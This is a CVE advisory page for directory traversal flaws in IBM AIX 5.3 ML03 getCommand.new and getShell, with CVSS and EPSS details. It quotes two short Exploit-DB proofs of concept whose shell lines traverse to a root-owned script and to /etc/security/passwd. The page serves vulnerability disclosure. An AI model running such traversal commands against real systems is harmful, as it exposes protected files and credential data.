CVE-2006-0133 : Detail

CVE-2006-0133

0.05%V3
Local
2006-01-09
10h00 +00:00
2018-10-19
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple directory traversal vulnerabilities in AIX 5.3 ML03 allow local users to determine the existence of files and read partial contents of certain files via a .. (dot dot) in the argument to (1) getCommand.new (aka getCommand) and (2) getShell, a different vulnerability than CVE-2005-4273.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 3.6 AV:L/AC:L/Au:N/C:P/I:P/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 26997

Publication date : 2005-12-31 23h00 +00:00
Author : xfocus
EDB Verified : Yes

source: https://www.securityfocus.com/bid/16103/info IBM AIX is prone to a local vulnerability in getShell and getCommand. This vulnerability may let the attacker gain unauthorized read access to shell scripts on the computer. -bash-3.00$ ls -l /tmp/k.sh -rwx------ 1 root system 79 2005-12-22 23:40 /tmp/k.sh -bash-3.00$./getCommand.new ../../../../../tmp/k.sh ps -ef > /tmp/log. $$ grep test /tmp/log. $$ rm /tmp/log. $$
Exploit Database EDB-ID : 26996

Publication date : 2005-12-29 23h00 +00:00
Author : xfocus
EDB Verified : Yes

source: https://www.securityfocus.com/bid/16102/info IBM AIX is prone to a local vulnerability in getShell and getCommand. This issue may let local attackers enumerate the existence of files on the computer that they wouldn't ordinarily be able to see. -bash-3.00$./getCommand.new ../../../../../../etc/security/passwd -bash-3.00$./getCommand.new ../../../../../../etc/security/passwd.aa fopen: No such file or directory

Products Mentioned

Configuraton 0

Ibm>>Aix >> Version 5.3_ml03

References

http://securitytracker.com/id?1015429
Tags : vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/bid/16102
Tags : vdb-entry, x_refsource_BID
http://www.securityfocus.com/bid/16103
Tags : vdb-entry, x_refsource_BID